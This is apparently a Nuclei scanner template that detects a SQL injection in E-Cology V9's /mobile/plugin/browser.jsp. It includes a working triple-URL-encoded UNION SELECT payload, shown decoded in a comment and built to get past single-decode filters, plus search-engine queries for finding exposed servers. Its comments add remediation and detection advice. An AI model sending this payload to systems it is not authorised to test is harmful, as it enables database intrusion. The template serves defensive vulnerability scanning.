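# Nuclei detection template for CNVD-2023-12632: SQL injection in the
# `keyword` parameter of /mobile/plugin/browser.jsp on E-Cology V9.
# The probe is a single POST that asks the database to compute a constant
# MD5 value and checks that the value is echoed back in the response.
id: CNVD-2023-12632

info:
  name: E-Cology V9 - SQL Injection
  author: daffainfo
  severity: high
  # NOTE(review): "Panmicro" looks like a literal translation of the vendor
  # name in the fofa-query below; the vendor is usually referred to as
  # Weaver in English. Confirm before changing the text.
  description: |
    Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
  # Generic guidance only: neither this template nor its references name a
  # fixed version, so none is stated here.
  remediation: |
    Apply the vendor's current security updates for e-cology 9 and restrict access to the /mobile/plugin/ endpoints to trusted networks where they are not needed externally.
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  classification:
    cwe-id: CWE-89
  metadata:
    max-request: 1
    verified: true
    # Quoted because the value itself contains double quotes.
    fofa-query: 'app="泛微-协同商务系统"'
    shodan-query: 'ecology_JSessionid'
  tags: cnvd,cnvd2023,ecology,sqli

# Decoded form of the `keyword` value sent below:
# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times
#
# Detection note: a log or WAF rule that matches SQL keywords after a single
# URL-decode pass will not see this request as SQL. Decode repeatedly before
# matching, or alert on nested percent-encoding (%25%32%35...) in POST bodies
# sent to /mobile/plugin/browser.jsp.

http:
  - raw:
      - |
        POST /mobile/plugin/browser.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

    # Both matchers must pass, which keeps false positives low: the marker
    # hash alone could in principle appear on an unrelated page.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # Expected output of the md5(9999999) expression in the probe; its
          # presence shows the injected expression was evaluated by the database.
          - '283f42764da6dba2522412916b031080'
          # Presumably keys of the endpoint's normal JSON response, used to
          # confirm the reply comes from browser.jsp; verify against a
          # known-good response.
          - '"autoCount"'
          - '"autoGet"'
        condition: and

      - type: status
        status:
          - 200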